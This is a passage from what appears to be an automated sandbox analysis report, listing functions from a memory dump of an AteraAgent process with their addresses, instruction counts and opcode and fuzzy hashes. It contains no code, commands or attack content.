                                                                                                                                                                                                                                          • Opcode ID: ed9e5d2977250e3bdab72730bf9ae7f7fa5e08bfc7ed0e508dfdc4c4fa09d33e
                                                                                                                                                                                                                                          • Instruction ID: 0645d9995704b2843ade5d2977bdcb639ca0a60054bc724d2a2365442aebb8fe
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: ed9e5d2977250e3bdab72730bf9ae7f7fa5e08bfc7ed0e508dfdc4c4fa09d33e
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: A1112532B2ED4A8FEBE9829D3C551783AC5DF9A65074940BBE80DC3267DC138C4983C2
                                                                                                                                                                                                                                          Function 00007FFAAB598423 Relevance: .1, Instructions: 76COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.1930786521.00007FFAAB580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB580000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffaab580000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 896270b5067e6b5c8deddf3b15365e61785028b80d719940d07c534ba04baf4a
                                                                                                                                                                                                                                          • Instruction ID: 7c499c702a8386cd3867bc55b2d4fa7efa447ef5766caea36eb92720e0f6b6f8
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 896270b5067e6b5c8deddf3b15365e61785028b80d719940d07c534ba04baf4a
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5E01CC7374DA0D8FA69CFA0CA8469B437D1EB5A2B030405ABD44EC7662E802EC834786
                                                                                                                                                                                                                                          Function 00007FFAAB59532A Relevance: .1, Instructions: 69COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.1930786521.00007FFAAB580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB580000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffaab580000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 99f1121cc8fa9aafa12cd112d492eaae3df2e510c4912c81201c386d65ef5938
                                                                                                                                                                                                                                          • Instruction ID: 35121f6b7bc4cfbf8f3d0ae48489aba1ff3b0615e5f2bd6bc784eaaa7b6d3ee9
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 99f1121cc8fa9aafa12cd112d492eaae3df2e510c4912c81201c386d65ef5938
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B4118272B1EF4B8FEAA8DB0C702427963D2EBA9295714857ED00EC7195DD15AC0E8380
                                                                                                                                                                                                                                          Function 00007FFAAB5DEDC0 Relevance: .1, Instructions: 67COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.1930786521.00007FFAAB580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB580000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffaab580000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: eef06ab8d210c002fe0e9af5ead34a2ff14e140b118b6d77200a28202f189ab6
                                                                                                                                                                                                                                          • Instruction ID: 20bdd022a3fda316f42b9f7ca39370c8f5b900dd58baad94ee3262a10bb3789f
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: eef06ab8d210c002fe0e9af5ead34a2ff14e140b118b6d77200a28202f189ab6
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6C11913170581A8FE9A4EB5D9498A3A33D9FF8A340F50457EE04FC36A3DE14AC4583C4
                                                                                                                                                                                                                                          Function 00007FFAAB58D965 Relevance: .1, Instructions: 65COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.1930786521.00007FFAAB580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB580000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffaab580000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 9b894903371b26fad1b019c7dee0a60777c3bca4400e68c886d2b818578338d2
                                                                                                                                                                                                                                          • Instruction ID: dfe9cbabe9f34ddac1d81abaceb3a19921b94ce8e9208ce02b38420c698d1781
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 9b894903371b26fad1b019c7dee0a60777c3bca4400e68c886d2b818578338d2
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 19114C6140E7C59FD7069B7888659617FE0AF67210B4945EFD089CB1F3C92C988ACB52
                                                                                                                                                                                                                                          Function 00007FFAAB5A4350 Relevance: .1, Instructions: 62COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.1930786521.00007FFAAB580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB580000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffaab580000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: d625300d33704d2cdac28c79de4b9c9328fef2a4fb0ff4bedb8618d9a2ddbfbd
                                                                                                                                                                                                                                          • Instruction ID: 792f962feaf5d64580403cd370c99c96a4937dab2f84359e4cd8519d4c603205
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d625300d33704d2cdac28c79de4b9c9328fef2a4fb0ff4bedb8618d9a2ddbfbd
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 52110630618A168FD769E738D488BA577E1FF45300F1485ADC48FC7296EA29B8C6C780
                                                                                                                                                                                                                                          Function 00007FFAAB5940B8 Relevance: .1, Instructions: 59COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.1930786521.00007FFAAB580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB580000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffaab580000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 5487bd8e90804d517be8d1a387838a89e4a5bcd1af44ded9b8799468d6c9c68a
                                                                                                                                                                                                                                          • Instruction ID: a145eb0aa100e7099fd4f76a68338b2d8c6b63b00afb3e466bfbca63e6057800
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 5487bd8e90804d517be8d1a387838a89e4a5bcd1af44ded9b8799468d6c9c68a
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CD01DD83B0EA874FF255975C289A1F45B94EF5517171482B7D00EC31F7DC4A5D1E42C1
                                                                                                                                                                                                                                          Function 00007FFAAB58A670 Relevance: .1, Instructions: 57COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.1930786521.00007FFAAB580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB580000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffaab580000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: c1a8e4bdedc775ca461fe6b989d00ab5d140a5ed92e6120ef43c2be6a2e43af2
                                                                                                                                                                                                                                          • Instruction ID: 05122ea5cf71c92b7fde7cd492201aa1cd1ef8e8d3198d8e48e86a0b9ea30186
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c1a8e4bdedc775ca461fe6b989d00ab5d140a5ed92e6120ef43c2be6a2e43af2
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5901D630B0994E4FE6D4DA9CA84577637C5EB99350F00027AE40DC3266ED19D80583C1
                                                                                                                                                                                                                                          Function 00007FFAAB5852FD Relevance: .1, Instructions: 55COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.1930786521.00007FFAAB580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB580000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffaab580000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 6a01474ab397bfd7bc898de5029969d9844709d0502333945b4eb9c3413c9c58
                                                                                                                                                                                                                                          • Instruction ID: 79f767f8243c85eef313ddb7841769896f0db073b62dd86260e5756d75fd4b7b
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 6a01474ab397bfd7bc898de5029969d9844709d0502333945b4eb9c3413c9c58
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4501267284E2CA9FD3525F7098520F67FA8EF07340F0940A6E00DC64A3D95D564A8392
                                                                                                                                                                                                                                          Function 00007FFAAB5979C1 Relevance: .1, Instructions: 53COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.1930786521.00007FFAAB580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB580000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffaab580000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 17671c2434b9282b33a90f23f9e746eaec32faccb9d0536854d562d6b7ae4ec4
                                                                                                                                                                                                                                          • Instruction ID: b0bacc621472168c9e05afcd07c022ad23a848f6c70f29873fc566f45855ef92
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 17671c2434b9282b33a90f23f9e746eaec32faccb9d0536854d562d6b7ae4ec4
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F9F0B42261DA880FE798962CAC4E9727BD4DB6B17671502FBE44DC7173E9079C068394
                                                                                                                                                                                                                                          Function 00007FFAAB59C775 Relevance: .1, Instructions: 52COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.1930786521.00007FFAAB580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB580000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffaab580000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 14db80f33487bc6ef93cca3f297b3240904f205372c1e56aabc8c8f6a252a791
                                                                                                                                                                                                                                          • Instruction ID: c1a66a7d1621a6ead050e926923456eb8a8c73bac93d9e2424c31cd9ef7c8171
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 14db80f33487bc6ef93cca3f297b3240904f205372c1e56aabc8c8f6a252a791
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0601FD31A19A094FE384EB2CD49A3B5B3D1EF89351F1800FAC40DCB2A7DE1AAC408340
                                                                                                                                                                                                                                          Function 00007FFAAB59ECFD Relevance: .1, Instructions: 52COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.1930786521.00007FFAAB580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB580000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffaab580000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: c77fa63a1c722fb9bbb246e0056f75175cf8f08e67b025f8badabcf9cc74b673
                                                                                                                                                                                                                                          • Instruction ID: bc0ce76e05aafbfe8323e43da6fc44f6403bbe167dd7ff467ebecd7399262807
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c77fa63a1c722fb9bbb246e0056f75175cf8f08e67b025f8badabcf9cc74b673
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: E601497180D6CD9FF755DB28C8591A9BFB0EF46240F0581FAD40DC70A3DA25190D87C1
                                                                                                                                                                                                                                          Function 00007FFAAB59EA9D Relevance: .1, Instructions: 51COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.1930786521.00007FFAAB580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB580000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffaab580000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: eca70e9ac17a7baaff88a0c75e4e32e1ffbe465db659cbec88e3c6d21b336dab
                                                                                                                                                                                                                                          • Instruction ID: c55e50c0bd4de38af1d8487f2f74b86ef463c22594308f77f68056a96370dda5
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: eca70e9ac17a7baaff88a0c75e4e32e1ffbe465db659cbec88e3c6d21b336dab
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: DF012B1150EFC68FDB6E973854652B52FD5AF57240F0800BAC0CEC60A3DC45584E8391
                                                                                                                                                                                                                                          Function 00007FFAAB58AE30 Relevance: .0, Instructions: 50COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.1930786521.00007FFAAB580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB580000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffaab580000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 3d0a2dbab0f46596e5081cacb8bdba1fa2156dd38b7d6a04279f25272fc53a25
                                                                                                                                                                                                                                          • Instruction ID: 89226543c6bbf1cf17721c576916be052af09226ddecd41426ec585708053ebe
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3d0a2dbab0f46596e5081cacb8bdba1fa2156dd38b7d6a04279f25272fc53a25
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: D901DB61A24E4F8FDE98EB6CD0505B673D5FFD9340B444979D00EC718AED18E8468780
                                                                                                                                                                                                                                          Function 00007FFAAB584228 Relevance: .0, Instructions: 49COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.1930786521.00007FFAAB580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB580000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffaab580000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: c667ca817d23aa906a0600842e4230aa13a726aa76ae0b63456d8124ac333d4a
                                                                                                                                                                                                                                          • Instruction ID: 0a32d9b597ea8af375b39e39f30febb4be175ee9248c769a40214185d3fcb5c7
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c667ca817d23aa906a0600842e4230aa13a726aa76ae0b63456d8124ac333d4a
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5AF0F635D4950D8BE720AFA4E4003FDF7B8EB83394F00103AC40EA7151D73A9599CB84
                                                                                                                                                                                                                                          Function 00007FFAAB58BF80 Relevance: .0, Instructions: 49COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.1930786521.00007FFAAB580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB580000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffaab580000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 758893d0654f6d23616bb480c6b12420c5e79e31d491d26921887f4f40435257
                                                                                                                                                                                                                                          • Instruction ID: 37dee9ca77b8a29d9f7e311b5123b0512ab95e628b6228be9f705b3f4b682e47
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 758893d0654f6d23616bb480c6b12420c5e79e31d491d26921887f4f40435257
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4A01DB61A18E4B4FDA98EB78D0509B573E5FFA4340B4445B9D00DC7286DD25E8464741
                                                                                                                                                                                                                                          Function 00007FFAAB5A1251 Relevance: .0, Instructions: 46COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.1930786521.00007FFAAB580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB580000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffaab580000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 733f64d86165f41ea2b6067c04e67a30ced60cb7a88d35d0bfcc44ab2b753c60
                                                                                                                                                                                                                                          • Instruction ID: 6035a4fd3cb5dfbdc3b6e191ae10a399b351d11d10abf7824edc83b01bb3fe27
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 733f64d86165f41ea2b6067c04e67a30ced60cb7a88d35d0bfcc44ab2b753c60
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7DF0B432B1DA0ACFAA58965CB88517837C4EF5737170441BED58FC35F3D921A80786C5
                                                                                                                                                                                                                                          Function 00007FFAAB59D18D Relevance: .0, Instructions: 46COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.1930786521.00007FFAAB580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB580000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffaab580000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 77ff828bf336cc7bcb0b8492b481d17cca9b0442b8b22bba43bb439c85d635bd
                                                                                                                                                                                                                                          • Instruction ID: e7ed896751e93468b8a2357aa1e11bedeccc47b389324abb5ddb5d8d496fb5ec
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 77ff828bf336cc7bcb0b8492b481d17cca9b0442b8b22bba43bb439c85d635bd
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 7B01D11691F6C78ED353937C28202A12FA88E8316470C41EBD4CDCA0EBD80D1869C3E2
                                                                                                                                                                                                                                          Function 00007FFAAB584B89 Relevance: .0, Instructions: 44COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.1930786521.00007FFAAB580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB580000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffaab580000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 57b72912662a9f20820dc5bf47795c1b494ba7b003d4ced146f9bab8bdbbd547
                                                                                                                                                                                                                                          • Instruction ID: 4abec3fa5f55274f2a858496e7e524aaa6033caae1aba76944057ec4a4b10a67
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 57b72912662a9f20820dc5bf47795c1b494ba7b003d4ced146f9bab8bdbbd547
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 8701A26180D78A9FE741DBB4C8552E97BB4EF16241F4541F2D40ECB0B3DA281A498751
                                                                                                                                                                                                                                          Function 00007FFAAB589E95 Relevance: .0, Instructions: 41COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.1930786521.00007FFAAB580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB580000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffaab580000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: dc9cea1964a1581b715a1e02120e7b4e577d238cfeea18f8d6e18d90081a31d5
                                                                                                                                                                                                                                          • Instruction ID: 50b532b8e49b4f9a9b9cfcfdf8f2943387fb108cf1fe5a299709ecc05de4ceda
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: dc9cea1964a1581b715a1e02120e7b4e577d238cfeea18f8d6e18d90081a31d5
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: CCF0E241E0FE8B4FD25693AC18651BC2FD6DB9A1A0B4811B7C04EC72A7DC0D4C5A03D2
                                                                                                                                                                                                                                          Function 00007FFAAB584B1D Relevance: .0, Instructions: 40COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.1930786521.00007FFAAB580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB580000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffaab580000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 3937fa39bb8781ebff7f25a92a00e1e71abba969c6f4687787a31ebb09f8af81
                                                                                                                                                                                                                                          • Instruction ID: 376fcbb346c502f7494e4007d96093c04c6049bf2976cb3fbc4816edff45e059
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3937fa39bb8781ebff7f25a92a00e1e71abba969c6f4687787a31ebb09f8af81
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 4101A23080A68ECFDB84EF64C8552E97BA1FF56300F0144B9E40DC71A2CA79A855C780
                                                                                                                                                                                                                                          Function 00007FFAAB58AF99 Relevance: .0, Instructions: 40COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.1930786521.00007FFAAB580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB580000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffaab580000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: df94c18630ecb7a4edda119a3e6363e7bf364d2ecf8c796854c203bf671dd706
                                                                                                                                                                                                                                          • Instruction ID: f53d817104d0661936e3c5d70e873a2a8e3725d2407688ccd5f0a277ce7495db
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: df94c18630ecb7a4edda119a3e6363e7bf364d2ecf8c796854c203bf671dd706
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 50014B70919BCE4FDB46DB6888581B97FB0FF56200B0404EBD459C71A2DA7555188741
                                                                                                                                                                                                                                          Function 00007FFAAB590F12 Relevance: .0, Instructions: 39COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.1930786521.00007FFAAB580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB580000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffaab580000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: c9d9bc7bef86a217e38434e52c193b0d04046691ea6c505e593931d0e51017be
                                                                                                                                                                                                                                          • Instruction ID: 56a99dc5eb2b05a9889b98b0a3bb89e306bd4f3bff0d636b165090e52fa322fc
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: c9d9bc7bef86a217e38434e52c193b0d04046691ea6c505e593931d0e51017be
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: C8F0F42140E6CB4FD346976894149A07BE4EF46340B0C45F6C48DCB2A7DA19A9898791
                                                                                                                                                                                                                                          Function 00007FFAAB583E50 Relevance: .0, Instructions: 38COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000010.00000002.1930786521.00007FFAAB580000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB580000, based on PE: false
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_16_2_7ffaab580000_AteraAgent.jbxd
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 046fb5d1a02d9c2f0efa566224013a8fd0bc93b8017a3ef3eedc736b603d3488
                                                                                                                                                                                                                                          • Instruction ID: 30badb682329e473d1815455cd29a72fbdc76761b35f25b3b4f382b1426324a0
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 046fb5d1a02d9c2f0efa566224013a8fd0bc93b8017a3ef3eedc736b603d3488
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0AF08C30C0560D8BD710AFA5E0003F9F7B8EF4B345F405039D00DA2191C37A9599CB54
